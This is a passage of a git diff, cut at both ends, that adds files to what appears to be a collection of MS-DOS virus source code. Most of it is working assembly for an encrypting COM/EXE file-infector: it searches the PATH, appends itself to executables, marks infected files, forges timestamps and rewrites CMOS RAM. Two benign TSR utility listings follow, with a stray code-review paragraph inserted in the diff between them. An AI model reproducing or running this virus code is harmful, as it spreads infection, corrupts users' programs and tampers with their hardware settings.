quit + xchg ax,bx ;bx = file handle + +;******************** +; 4-Read 1st 28 bytes +;******************** + + mov cx,28d ;read first 5 bytes of file + lea dx,[si + START_CODE - VIRUS] ;store'em here + mov ah,3Fh ;DOS read function + int 21h + jc NO_GOOD ;error? get next file + +;********************* +; 5-CHECK FILE +;********************* + + cmp WORD PTR [si + START_CODE - VIRUS],'ZM' ;EXE file? + je CHECK_EXE ;no? check com + + cmp WORD PTR [si + START_CODE - VIRUS],'MZ' ;EXE file? + je CHECK_EXE ;no? check com + +CHECK_COM: + mov ax,WORD PTR [si + DTA_File_SIZE - VIRUS] ;get file's size + push ax ;insert new entry point just in case.. + add ax,100h + DECRYPTOR_SIZE + mov WORD PTR [si + 1],ax + pop ax + + add ax,OFFSET FINAL - OFFSET VIRUS ;add virus size to it + jc NO_GOOD ;bigger then 64K:nogood + + cmp BYTE PTR [si + START_CODE - VIRUS],0E9H ;compare 1st byte to near jmp + jne short INFECT_COM ;not a near jmp, file ok + + cmp BYTE PTR [si + START_CODE+3 - VIRUS],20h ;check for ' ' + je NO_GOOD ;file ok .. infect + jmp short INFECT_COM + + +CHECK_EXE: + cmp WORD PTR [si + START_CODE - VIRUS + 18h],40h ;Windows file? + je NO_GOOD ;no? check com + + cmp WORD PTR [si + START_CODE - VIRUS + 01Ah],0 ;internal overlay + jne NO_GOOD ;yes? exit.. + + cmp WORD PTR [si + START_CODE - VIRUS + 12h],ID ;already infected? 
+ je NO_GOOD + +INFECT_EXE: + mov BYTE PTR [si+ COM_FLAG - VIRUS],01 ;exe infection + jmp short SKIP + +INFECT_COM: + mov BYTE PTR [si+ COM_FLAG - VIRUS],00 ;com infection + +SKIP: + +;********************* +; 6-set PTR @EOF +;********************* + + xor cx,cx ;prepare to write virus on file + xor dx,dx ;position file pointer,cx:dx = 0 + ;cwd ;position file pointer,cx:dx = 0 + mov ax,4202H + int 21h ;locate pointer at end EOF DOS function + +;********************* +; 7-Fix deCRYPTtor +;********************* + + push ax ;save file size (COM file, for EXE files + ;this is redone later) + add ax,100h + DECRYPTOR_SIZE + mov WORD PTR [si + WORK_BUFFER - VIRUS + 4],ax ;insert address + mov ax,(OFFSET FINAL - OFFSET VIRUS)/2 ;virus size in Words + mov WORD PTR [si + WORK_BUFFER - VIRUS + 1],ax ;insert size + + in al,40h ;get a random word in AX + xchg ah,al + in al,40h + xor ax,0813Ch + add ax,09249h + rol al,1 + ror ah,1 + + mov WORD PTR [si + WORK_BUFFER - VIRUS + 9],ax ;insert random KEY + pop ax ;restore file size + + + cmp BYTE PTR [si+ COM_FLAG - VIRUS],01 ;exe file? 
+ jne DO_COM + +;************************* +; 8-FIX AND WRITE EXE HDR +;************************* + + push bx ;save file handler + +;----------------------- +; save CS:IP & SS:SP +;----------------------- + + push si + cld ;clear direction flag + lea di,[si + ORIG_SSSP - VIRUS] ;save original CS:IP at es:di + lea si,[si + START_CODE - VIRUS + 14d] ;from ds:si + movsw ;save ss + movsw ;save sp + + add si,02 ;save original SS:SP + movsw ;save ip + movsw ;save cs + pop si + +;----------------------------- +; calculate new CS:IP +;----------------------------- + + mov bx,WORD PTR[si + START_CODE - VIRUS + 8] ;header size in paragraphs + mov cl,04 ;multiply by 16, won't work with headers > 4096 + shl bx,cl ;bx=header size + + push ax ;save file size at dx:ax + push dx + + sub ax,bx ;file size - header size + sbb dx,0000h ;fix dx if carry, assures dx, ip < 16 + + call CALCULATE + + mov WORD PTR [si+ START_CODE - VIRUS + 12h],ID ;put ID in checksum slot + mov WORD PTR [si+ START_CODE - VIRUS + 14h],ax ;IP + add ax,DECRYPTOR_SIZE + mov WORD PTR [si+1],ax ;insert new starting address + mov WORD PTR [si + WORK_BUFFER - VIRUS + 4],ax ;insert address on decryptor + mov WORD PTR [si+ START_CODE - VIRUS + 16h],dx ;CS + +;----------------------------- +; calculate & fix new SS:SP +;----------------------------- + + pop dx + pop ax ;filelength in dx:ax + + add ax,OFFSET FINAL - OFFSET VIRUS ;add filesize to ax + adc dx,0000h ;fix dx if carry + + push ax + push dx + add ax,40h ;if filesize + virus size is even then the stack size + test al,01 ;even or odd stack? 
+ jz EVENN + inc ax ;make stack even +EVENN: + call CALCULATE + + mov WORD PTR [si+ START_CODE - VIRUS + 10h],ax ;SP + mov WORD PTR [si+ START_CODE - VIRUS + 0Eh],dx ;SS + +;----------------------------- +; Calculate new file size +;----------------------------- + + pop dx + pop ax + + push ax + mov cl,0009h ;2^9 = 512 + ror dx,cl ;/ 512 (sort of) + shr ax,cl ;/ 512 + stc ;set carry flag + adc dx,ax ;fix dx , page count + pop cx + and ch,0001h ;mod 512 + + mov WORD PTR [si+ START_CODE - VIRUS + 4],dx ;page count + mov WORD PTR [si+ START_CODE - VIRUS + 2],cx ;save remainder + + pop bx ;restore file handle + +DO_COM: + +;********************* +; 9-write deCRYPTor +;********************* + + lea dx,[si + WORK_BUFFER - VIRUS] ;write from here + mov cx,DECRYPTOR_SIZE ;write # of bytes + mov ah,40h ;write to file bx=file handle + int 21h ;write from DS:DX + +;********************* +; 10-enCRYPT virus +;********************* + + push ds ;save DS + push es ;save ES + mov ax,0A00h ;set up new ES (work) segment + push ax + pop es ;ES=AX=0A00h + xor di,di ;DI=0 + mov cx,(OFFSET FINAL - OFFSET VIRUS)/2 ;virus size cx= # words + push si ;save SI + mov dx,WORD PTR [si + WORK_BUFFER - VIRUS + 9] ;get Random KEY in DX + +enCRYPT: + lodsw ;word ptr ds:[si] => ax + sub ax,dx ;encrypt ax + stosw ;ax => word ptr es:[di] + loop enCRYPT + + pop si ;restore SI + xor dx,dx ;DX=0 + push es + pop ds ;DS=ES + +;********************* +; 11-Write Virus +;********************* + + mov cx,OFFSET FINAL - OFFSET VIRUS ;write virus cx= # bytes + mov ah,40h ;write to file bx=file handle + int 21h ;write from DS:DX + + pop es ;restore ES + pop ds ;restore DS + +;********************* +; 12-set PTR @BOF +;********************* + + mov ax,4200h ;locate pointer at beginning of + xor cx,cx + xor dx,dx ;position file pointer,cx:dx = 0 + ;cwd ;position file pointer,cx:dx = 0 + int 21h ;host file + + cmp BYTE PTR [si+ COM_FLAG - VIRUS],01 ;exe file? 
+ jne DO_COM2 + +;********************* +; 13-Write EXE Header +;********************* + + mov cx,28d ;#of bytes to write + lea dx,[si + START_CODE - VIRUS] ;ds:dx=pointer of data to write + jmp short CONT + +;**************************************************** +; 14-write new 4 bytes to beginning of file (COM) +;*************************************************** + +DO_COM2: + mov ax,WORD PTR [si + DTA_File_SIZE - VIRUS] + sub ax,3 + mov WORD PTR [si + START_IMAGE + 1 - VIRUS],ax + + mov cx,4 ;#of bytes to write + lea dx,[si + START_IMAGE - VIRUS] ;ds:dx=pointer of data to write + +CONT: + mov ah,40h ;DOS write function + int 21h ;write 5 / 28 bytes + +;************************************************* +; 15-Restore date and time of file to be infected +;************************************************* + + mov ax,5701h + mov dx,WORD PTR [si + DTA_File_DATE - VIRUS] + mov cx,WORD PTR [si + DTA_File_TIME - VIRUS] + and cx,0FFE0h ;mask all but seconds + or cl,1Dh ;seconds to 58 + int 21h + +GET_OUT: +;**************** +; 16-Close File +;**************** + + pushf ;save flags to return on exit + mov ah,3Eh + int 21h ;close file + +;************************************************* +; 17-Restore file's attributes +;************************************************* + + mov ax,4301h ;set file attributes to cx + lea dx,[si + WORK_AREA - VIRUS] ;dx=ptr to path + current filename + xor cx,cx + mov cl,BYTE PTR [si + DTA_File_ATTR - VIRUS] ;get old attributes + int 21h + popf ;restore flags to return on exit + ret ;infection done! 
+ +;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + +CALCULATE: + mov cl,0Ch + shl dx,cl ;dx * 4096 + mov bx,ax + mov cl,4 + shr bx,cl ;ax / 16 + add dx,bx ;dx = dx * 4096 + ax / 16 =SS CS + and ax,0Fh ;ax = ax and 0Fh =SP IP + ret + +;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + +FIND_FILE: + push si + push es + mov es,es:WORD PTR [si + PSP_SEG - VIRUS] ;es=saved PSP segment + mov es,es:2ch ;es:di points to environment + xor di,di + mov bx,si +FIND_PATH: + lea si,[bx + PATH_STR - VIRUS] ;source :ds:si = 'P' + lodsb ;load 'P' + mov cx,7FFFh ;size of environment= 32768 bytes + not cx ;cx=8000h + repne scasb ;find 'P' in es:di + mov cx,4 + +CHECK_NEXT_4: + lodsb ;check for 'ATH' + scasb + jne FIND_PATH + loop CHECK_NEXT_4 + + mov WORD PTR [bx + PATH_ADDRESS - VIRUS],di ;save path's address es:di + lea di,[bx + WORK_AREA - VIRUS] + pop es ;restore PSP segment + jmp short COPY_FILE_SPEC_TO_WORK_AREA + +NO_FILE_FOUND: + cmp word ptr [bx + PATH_ADDRESS - VIRUS],0 ;has path string ended? + jne FOLLOW_THE_PATH ;if not there are more subdirs + jmp EXIT ;path string ended.. exit + +FOLLOW_THE_PATH: + lea di,[bx + WORK_AREA - VIRUS] ;destination es:di = work area + mov si,WORD PTR [bx + PATH_ADDRESS - VIRUS] ;source ds:si = Environment + mov ds,WORD PTR [bx + PSP_SEG - VIRUS] ;ds=PSP segment + mov ds,ds:2ch ;ds:si points to environment + +UP_TO_LODSB: + lodsb ;get character + xchg cx,ax ;he he + cmp cl,';' ;is it a ';'? + xchg cx,ax ;he he + je SEARCH_AGAIN + cmp al,0 ;end of path string? + je CLEAR_SI + stosb ;save path marker into di + jmp SHORT UP_TO_LODSB + +CLEAR_SI: ;mark the fact that we are looking thru the final subdir + xor si,si + +SEARCH_AGAIN: + mov WORD PTR cs:[bx + PATH_ADDRESS - VIRUS],si ;save address of next subdir + cmp BYTE PTR cs:[di-1],'\' ;ends with a '\'? 
+ je COPY_FILE_SPEC_TO_WORK_AREA + mov al,'\' ;add '\' if not + stosb + +;*********************************************** +; put *.COM / *.EXE into workspace +;*********************************************** + +COPY_FILE_SPEC_TO_WORK_AREA: + push cs + pop ds ;ds=cs + mov WORD PTR [bx + FILENAME_PTR - VIRUS],di ;es:di = WORK_AREA + mov si,bp ;bp=file spec + mov cx,3 ;length of *.com0/ *.EXE0 + rep movsw ;move *.COM0/ *.EXE0 to workspace + +;************************************************ +; Find FIRST FILE +;************************************************ + + mov ah,04EH ;DOS function + lea dx,[bx + WORK_AREA - VIRUS] ;dx points to path in workspace + mov cx,3Fh ;attributes RO or hidden OK +FIND_NEXT_FILE: int 21H + jnc FILE_FOUND + jmp short NO_FILE_FOUND + +FILE_FOUND: + mov di,WORD PTR [bx + FILENAME_PTR - VIRUS] ;destination: es:di + lea si,[bx + DTA_File_NAME - VIRUS] ;origin ds:si + +MOVE_ASCII_FILENAME: + lodsb ;move filename to the end of path + stosb + cmp al,0 ;end of ASCIIZ string? + jne MOVE_ASCII_FILENAME ;keep on going + pop si ;restore si to use in the following + push bp ;save COM / EXE string pointer + call CHECK_N_INFECT_FILE ;check file if file found + pop bp ;restore COM / EXE string pointer + jnc EXITX + mov bx,si ;fix bx + push si ;save si again + mov ah,04Fh + jmp short FIND_NEXT_FILE + +EXIT: + pop si +EXITX: + ret + +;============================================================================== +CMOS_CHCKSM: + +; INPUT: +; DL = CMOS ADDRESS of BYTE TO be MODiFiED +; BL = NEW BYTE VALUE to be PUT IN CMOS RAM + +; OUTPUT: +; None. 
+; REGISTERS USED: AX,CX,BX,DX + +;************************* +; GET CMOS Checksum => CX +;************************* + + xor ax,ax + mov al,2Eh ;msb of checksum address + out 70h,al ;send address / control byte + in al,71h ;read byte + + xchg ch,al ;store al in ch + + mov al,2Fh ;lsb of checksum address + out 70h,al ;send address / control byte + in al,71h ;read byte + + xchg cl,al ;store lsb to cl + +;********************* +; Fix CMOS Checksum +;********************* + + push dx + xchg dl,al ;AL = address + out 70h,al ;send address / control byte + in al,71h ;read register + + sub cx,ax ;subtract from checksum + + add cx,bx ;update checksum value in register. + +;**************************** +; Write CMOS byte to Address +;**************************** + + pop dx + xchg dl,al ;AL = address + out 70h,al ;specify CMOS address + xchg al,bl ;new CMOS value => al + + out 71h,al ;write new CMOS byte + +;********************* +; Write CMOS Checksum +;********************* + + mov al,2Eh ;address of checksum 's msb + out 70h,al ;specify CMOS address + xchg al,ch ;msb of new checksum + + out 71h,al ;write new CMOS msb + + mov al,2Fh ;address of checksum 's lsb + out 70h,al ;specify CMOS address + xchg al,cl ;lsb of new checksum + + out 71h,al ;write new CMOS lsb + ret + +;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + +NAME_AUTHOR db 'K-CM”S / K”hntark' + +WORK_BUFFER db 0B9h,00,00 ;mov cx,VSIZE + db 0BBh,00,00 ;mov si,VADDRESS + db 02Eh,081h,07,00,00 ;add WORD PTR cs:[si],KEY + db 083h,0C3h,02 ;add si,02 + ;db 043h,043h ;inc bx, inc bx + db 0E2h,0F6h ;loop add.. 
+ +COM_MASK db '*.COM',0 +EXE_MASK db '*.EXE',0 +PATH_STR db 'PATH=',0 + +START_IMAGE db 0E9h,0,0,020h + +ORIG_SSSP dw 0,0 +ORIG_IPCS dw 0,0 +COM_FLAG db 0 ;0=COM 1=EXE +START_CODE db 4 dup (90h) ;4 bytes of COM or EXE hdr goes here + +;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + +FINAL: ;label of byte of code to be kept in virus when it moves + +;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + +HEAP: + +START_CODE2 db 24d dup (0) ;2nd part of EXE hdr + +PSP_SEG dw 0 + +PATH_ADDRESS dw 0 +FILENAME_PTR dw 0 +WORK_AREA db 64 DUP (0),'$' + +DTA db 21 dup(0) ;reserved +DTA_File_Attr db ? +DTA_File_Time dw ? +DTA_File_Date dw ? +DTA_File_Size dd ? +DTA_File_Name db 13 dup(0) + +;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + +ID equ 77h +DECRYPTOR_SIZE equ 16d ; equ OFFSET WORK_BUFFER - OFFSET START_IMAGE + +MAIN ENDS + END HOST diff --git a/MSDOS/Virus.MSDOS.Unknown.kak.txt b/MSDOS/Virus.MSDOS.Unknown.kak.txt new file mode 100644 index 00000000..16c056b6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.kak.txt @@ -0,0 +1,71 @@ +
+
+
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.kbm.asm b/MSDOS/Virus.MSDOS.Unknown.kbm.asm
new file mode 100644
index 00000000..43f3ac45
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.kbm.asm
@@ -0,0 +1,253 @@
+;---------------------------------------------------------------------------
+;KBM KeyBoard Mouse by Dan Rollins 5-20-85
+;
+; This program intercepts keyboard data and creates a bit pattern determined
+; according to whether or not certain keys are currently being pressed.
+;
+; The bit pattern is stored in the "inter-application communication area"
+; at 0000:04f0. It is interpreted as:
+;
+; 7 6 5 4 3 2 1 0 (bit number)
+; C m P H l d r u (bit name)
+; | | | | | | | |
+; | | | | | | | +- bit 0 (01h) - set = 1 while [up arrow] is pressed
+; | | | | | | +--- bit 1 (02h) - set = 1 while [right arrow] is pressed
+; | | | | | +----- bit 2 (04h) - set = 1 while [down arrow] or [5] is pressed
+; | | | | +------- bit 3 (08h) - set = 1 while [left arrow] is pressed
+; | | | |
+; | | | +--------- bit 4 (10h) - set = 1 while [Home] is pressed
+; | | +----------- bit 5 (20h) - set = 1 while [PgUp] is pressed
+; | +------------- bit 6 (40h) - set = 1 while grey [-] is pressed
+; +--------------- bit 7 (80h) - set = 1 while [CapsLock] is pressed
+;
+; As soon as the key is released, the relevant bit is reset to 0.
+;
+; The byte at 0000:04f1 is the "pass-through/filter" mode flag. When this
+; byte is zero, all keystrokes are passed to the normal keyboard handler.
+; When it's non-zero, the selected keystrokes are filtered (disabled for
+; normal input). BIOS and DOS keyboard calls will not recognize them.
+;
+; The Alt-NumLock keystroke toggles between pass-through and filter modes.
+;
+; This program is installed and remains resident. It is a COM-format
+; file, so it must be converted with EXE2BIN.
+;
+; Copyright (c) Ziff-Davis Publishing Co., 1986. All rights reserved.
+;
+;= equates ===============
+
+KB_DATA_PORT equ 60h ;These are listed in the PC and XT
+KB_CTRL_PORT equ 61h ; Technical Reference Manuals
+
+KB_FLAG equ 417h ; the BIOS shift-key status (in segment 0)
+ALT_STATE equ 8 ; Bit pattern while the [Alt] key is pressed
+NUMLOCK_KEY equ 69 ; scan-code of the [NumLock] key
+
+INT_CTL_PORT equ 20h ; Interrupt controller port (8259 chip)
+EOI equ 20h ; End-Of-Interrupt code sent to 8259
+
+RELEASE_BIT equ 80h ;also called the "break" bit: a key was released
+
+KEY_BITS equ 04f0H ;the address of the key bit flags (segment 0)
+MODE_FLAG equ 04f1H ;when 0, all keys are passed to normal kbint
+INST_FLAG equ 04f2H ; set to 1234H during installation
+
+com_seg segment
+ assume cs:com_seg, ds:com_seg
+ org 100h ;must have for COM-format program
+kbm proc far
+ jmp set_up ;get past data and install interrupt hander
+
+;============= program data area ========
+
+norm_kbd_int label dword ;type DWORD so it can be used in a FAR jump
+nki_offset dw 0 ; This address is stored in the SET_UP proc
+nki_segment dw 0 ; It's the address of the previous kbint routine
+
+;-----------------------------------------------------------------------------
+; KBD_INT
+; 1) read the keyboard
+; 2) set/reset bits in mouse movement byte
+; 3) execute normal keyboard interrupt
+;
+; scan bit key suggested meaning
+; code flag name (defined by user)
+; ---- ---- --------- ----------------------
+kbm_tbl db 72, 1 ; num.pad 8 go up
+ db 77, 2 ; num.pad 6 go right
+ db 80, 4 ; num.pad 2 go down
+ db 75, 8 ; num.pad 4 go left
+
+ db 76, 4 ; num.pad 5 go down
+ db 71, 16 ; Home button 1
+ db 73, 32 ; PgUp button 2
+ db 74, 64 ; grey minus button 3
+ db 58, 128; CapsLock "high-gear shift" for fast motion
+tbl_end label byte
+
+;-----------------------------------------------------------------------------
+; KBD_INT
+; This procedure intercepts the ROM-BIOS KB_INT.
+; It sets and resets bits of a kbd flag as the user presses and releases keys.
+; When the byte at 0000:04F1 is 0, the keystroke is passed on to the
+; original keyboard handler.
+
+kbd_int proc far
+ sti
+ cld
+ push ax
+ push si
+ push ds
+
+ in al,KB_DATA_PORT ;read scan-code from keyboard into AL
+ mov ah,al ;save original byte in AH
+ and al,7fh ;mask off "release bit" for comparisons
+
+ mov si,offset kbm_tbl
+k_20:
+ cmp si,offset tbl_end ;at end of table?
+ ja k_25 ; yes, key not found. Exit to normal kbint
+ cmp al,byte ptr cs:[si] ; is this the key?
+ je k_30 ; yes, process the keystroke
+ inc si ; no, point past the scan code
+ inc si ; point past the bit-mask
+ jmp k_20 ; and loop back for the next entry
+
+k_25:
+;------- check for mode-toggle by user
+ cmp ah,NUMLOCK_KEY ;is this a press of [NumLock]?
+ jne k_27 ; no, go
+ sub si,si ; yes, look to BIOS data area
+ mov ds,si
+ test byte ptr ds:[KB_FLAG],ALT_STATE ; is [Alt] pressed?
+ jz k_27 ; no, pass the key on
+
+ xor byte ptr ds:[MODE_FLAG],1 ; yes, toggle the mode and
+ jmp short k_exit ; exit w/o processing
+
+;------- the keystroke is to be processed by the normal keyboard interrupt
+k_27:
+ pop ds
+ pop si
+ pop ax
+ jmp cs:[norm_kbd_int] ;continue at normal keyboard handler
+
+k_30:
+;------- process the scan code into a bit-pattern
+ mov al,cs:[si+1] ;get bit-flag mask
+
+ sub si,si
+ mov ds,si ;point to segment of KEY_BITS
+
+ test ah,RELEASE_BIT ;is this key being released?
+ jz k_40 ; no, go
+
+;------- process key release
+ not al ;flip-flop mask bits
+ and byte ptr ds:[KEY_BITS],al ;mask off released key bit
+ jmp k_50
+k_40:
+;------- process key press
+ or byte ptr ds:[KEY_BITS],al ;set the bit for pressed key
+
+;------- determine whether key should be passed on to normal keyboard handler
+k_50:
+ cmp byte ptr ds:[MODE_FLAG],0 ;should key be processed further?
+ je k_27 ; yes, continue at normal kb int
+
+;------- the keystroke is to be ignored by the rest of the system.
+;------- wrap up this keyboard interrupt.
+
+k_exit:
+ in al,KB_CTRL_PORT ;get current value of keyboard control lines
+ mov ah,al ; save it
+ or al,80h ;set the "enable kbd" bit
+ out KB_CTRL_PORT,al ; and write it out the control port
+ xchg ah,al ;fetch the original control port value
+ out KB_CTRL_PORT,al ; and write it back
+
+ pop ds
+ pop si
+
+ cli
+ mov al,EOI ;send End-Of-Interrupt signal
+ out INT_CTL_PORT,al ; to the 8259 Interrupt Controller
+ pop ax
+ iret ;exit to interrupted program
+kbd_int endp
+
+LAST_BYTE equ offset $+1 ;This is the address passed to INT 27H
+ ;Notice that the code of the SET_UP
+ ; procedure is not preserved in memory
+
+;-----------------------------------------------------------------------------
+; SET_UP
+; This routine is executed only once, when the program is installed.
+
+inst_msg db 'KBM KeyBoard Mouse driver',0dh,0ah
+ db 'Copyright (c) 1986 Ziff-Davis Publishing Co.,',0dh,0ah,'$'
+
+err_msg1 db 07,'Already installed',0dh,0ah,'$'
+err_msg2 db 'Wrong DOS version.',0dh,0ah,'$'
+
+set_up proc near
+
+;------- make sure this is DOS 2.0 or later
+ mov ah,30h
+ int 21h
+ cmp al,2
+ jae su_10
+ mov dx,offset err_msg2
+ jmp msg_exit
+su_10:
+
+;------- see if KBM has already been installed
+ mov ax,0
+ mov es,ax
+ cmp es:[INST_FLAG],1234H ;already installed?
+ jne su_20 ; no, continue
+ mov dx,offset err_msg1 ; yes, exit with message
+ jmp msg_exit
+su_20:
+ mov word ptr es:[INST_FLAG],1234h ; flag says KBM is installed
+
+;------- save the old kbint vector and set up the new one
+ mov al,9
+ mov ah,35h ;DOS GET_VECTOR service
+ int 21h ; for interrupt 9 (KBINT)
+
+ mov al,9 ;get address of the current kb int handler
+ mov ah,35h ;DOS GET_VECTOR service
+ int 21h
+ mov nki_segment,es ;save old address
+ mov nki_offset,bx
+
+ mov dx,offset kbd_int ;set INT 9 to local keyboard interceptor
+ mov al,9 ;set vector for INT 9 to DS:DX
+ mov ah,25h ;DOS SET_VECTOR service
+ int 21h
+
+ mov ax,0
+ mov es,ax ;initialize variables:
+ mov byte ptr es:[MODE_FLAG],0 ; process all keystrokes
+ mov byte ptr es:[KEY_BITS],0 ; no keys are pressed
+
+;------- display message to indicate install`tion complete
+ mov dx,offset inst_msg
+ mov ah,9
+ int 21h
+
+;------- exit to DOS, leaving the interrupt handler resident
+ mov dx,LAST_BYTE
+ int 27h
+
+msg_exit:
+ mov ah,9
+ int 21h
+ int 20h
+set_up endp
+kbm endp
+com_seg ends
+ end kbm
+
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.keeper.asm b/MSDOS/Virus.MSDOS.Unknown.keeper.asm
new file mode 100644
index 00000000..15155090
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.keeper.asm
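Review bot: The table scan in kbd_int leaves on `ja k_25` after `cmp si,offset tbl_end`, so when si equals tbl_end the loop still compares al against the byte at tbl_end (the first opcode of kbd_int) before exiting; the branch should be `jae k_25` so the sentinel offset itself ends the search. A false match is unlikely because `and al,7fh` keeps al below 80h, but the read past the table is still an off-by-one worth fixing. In set_up the INT 9 GET_VECTOR sequence (`mov al,9` / `mov ah,35h` / `int 21h`) is issued twice back to back and the first result is discarded, so one copy can be removed. The installed check keys on the word 1234H at 0000:04F2 in the inter-application communication area, which any other resident program is free to overwrite, so a stale or clobbered marker can let a second copy hook INT 9 again or refuse to install; a comment such as `; INST_FLAG lives in the shared IAC area and may be overwritten by other programs` would document that limitation.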
@@ -0,0 +1,483 @@
+VECTORS SEGMENT AT 0H ;Set up segment to intercept Interrupts
+ ORG 9H*4 ;The keyboard Interrupt
+KEYBOARD_INT LABEL DWORD
+ ORG 1CH*4 ;Timer Interrupt
+TIMER_VECTOR LABEL DWORD
+VECTORS ENDS
+
+SCREEN SEGMENT AT 0B000H ;A dummy segment to use as the
+SCREEN ENDS ;Extra Segment
+
+ROM_BIOS_DATA SEGMENT AT 40H ;BIOS statuses held here, also keyboard buffer
+
+ ORG 1AH
+ HEAD DW ? ;Unread chars go from Head to Tail
+ TAIL DW ?
+ BUFFER DW 16 DUP (?) ;The buffer itself
+ BUFFER_END LABEL WORD
+
+ROM_BIOS_DATA ENDS
+
+CODE_SEG SEGMENT
+ ASSUME CS:CODE_SEG
+ ORG 100H ;ORG = 100H to make this into a .COM file
+FIRST: JMP LOAD_KEEPER ;First time through
+
+ COPY_RIGHT DB '(C)1985 S.HOLZNER' ;Ascii autograph
+ PAD DB 20*102 DUP(0) ;Memory storage for pad
+ PAD_CURSOR DW 9*102 ;Current position in pad
+ ATTRIBUTE DB 112 ;Pad Attribute -- reverse video
+ LINE_ATTRIBUTE DB 240 ;Flashing Rev video
+ OLD_ATTRIBUTE DB 7 ;Original screen attrib: normal
+ PAD_OFFSET DW 0 ;Chooses 1st 250 bytes or 2nd
+ FIRST_POSITION DW ? ;Position of 1st char on screen
+ TRIGGER_FLAG DW 0 ;Trigger on or off
+ FULL_FLAG DB 0 ;Buffer Full Flag
+ LINE DW 9 ;Line number, 0-9
+ SCREEN_SEG_OFFSET DW 0 ;0 for mono, 8000H for graphics
+ IO_CHAR DW ? ;Holds addr of Put or Get_Char
+ STATUS_PORT DW ? ;Video controller status port
+ OLD_KEYBOARD_INT DD ? ;Location of old kbd interrupt
+ FINISHED_FLAG DB 1 ;If not finished,f buffer
+ COMMAND_INDEX DW 1 ;Stores positior timer)
+ ROM_TIMER DD 1 ;The Timer interrupt's address
+ OLD_HEAD DW 0
+
+KEEPER PROC NEAR ;The keyboard interrupt will now come here.
+ ASSUME CS:CODE_SEG
+ PUSH AX ;Save the used registers for good form
+ PUSH BX
+ PUSH CX
+ PUSH DX
+ PUSH DI
+ PUSH SI
+ PUSH DS
+ PUSH ES
+ PUSHF ;First, call old keyboard interrupt
+ CALL OLD_KEYBOARD_INT
+ ASSUME DS:ROM_BIOS_DATA ;Examine the char just put in
+ MOV BX,ROM_BIOS_DATA
+ MOV DS,BX
+ MOV BX,TAIL ;Point to current tail
+ CMP BX,HEAD ;If at head, kbd int has deleted char
+ JE BYE ;So leave
+ MOV DX,HEAD
+ SUB DX,2 ;Point to just read in character
+ CMP DX,OFFSET BUFFER ;Did we undershoot buffer?
+ JAE NOWRAP ;Nope
+ MOV DX,OFFSET BUFFER_END ;Yes -- move to buffer top
+ SUB DX,2 ;Compare two bytes back from head
+NOWRAP: CMP DX,TAIL ;If it's the tail, buffer is full
+ JNE NOTFULL ;We're OK, jump to NotFull
+ CMP FULL_FLAG,1 ;Check if keyboard buffer full
+ JE BYE ;Yep, leave
+ MOV FULL_FLAG,1 ;Oops, full, set flag and take
+ JMP CHK ; this last character
+NOTFULL:MOV FULL_FLAG,0 ;Always reset Full_Flag when buff clears
+CHK: CMP TRIGGER_FLAG,0 ;Is the window on (triggered?)
+ JNE SUBT ;Yep, keep going
+ MOV DX,OLD_HEAD ;Check position of buffer head
+ CMP DX,HEAD
+ JNE CONT
+ MOV OLD_HEAD,0
+BYE: JMP OUT
+CONT: MOV DX,HEAD
+ MOV OLD_HEAD,DX
+SUBT: SUB BX,2 ;Point to just read in character
+ CMP BX,OFFSET BUFFER ;Did we undershoot buffer?
+ JAE NO_WRAP ;Nope
+ MOV BX,OFFSET BUFFER_END ;Yes -- move to buffer top
+ SUB BX,2 ;
+NO_WRAP:MOV DX,[BX] ;Char in DX now
+ ;------ CHAR IN DX NOW -------
+ CMP FINISHED_FLAG,0
+ JE IN
+ CMP DX,310EH ;Default trigger is a ^N here.
+ JNE NOT_TRIGGER ;No
+ MOV TAIL,BX
+ NOT TRIGGER_FLAG ;Switch Modes
+ CMP TRIGGER_FLAG,0 ;Trigger off?
+ JNE TRIGGER_ON ;No, only other choice is on
+TRIGGER_OFF:
+ MOV OLD_HEAD,0 ;Reset old head
+ MOV AH,OLD_ATTRIBUTE ;Get ready to restore screen
+ MOV ATTRIBUTE,AH ;Pad and blinking line set to orig.
+ MOV LINE_ATTRIBUTE,AH ; values
+ MOV PAD_OFFSET,10*102 ;Point to 2nd half of pad
+ LEA AX,PUT_CHAR ;Make IO call Put_Char as it scans
+ MOV IO_CHAR,AX ;over all locations in pad on screen
+ CALL IO ;Restore screen
+ CMP LINE,9 ;Was the window turned off without
+ JE IN ; using up-down keys? If so, exit
+ MOV AX,LINE ;No, there is a line to stuff in
+ MOV CL,102 ; keyboard buffer
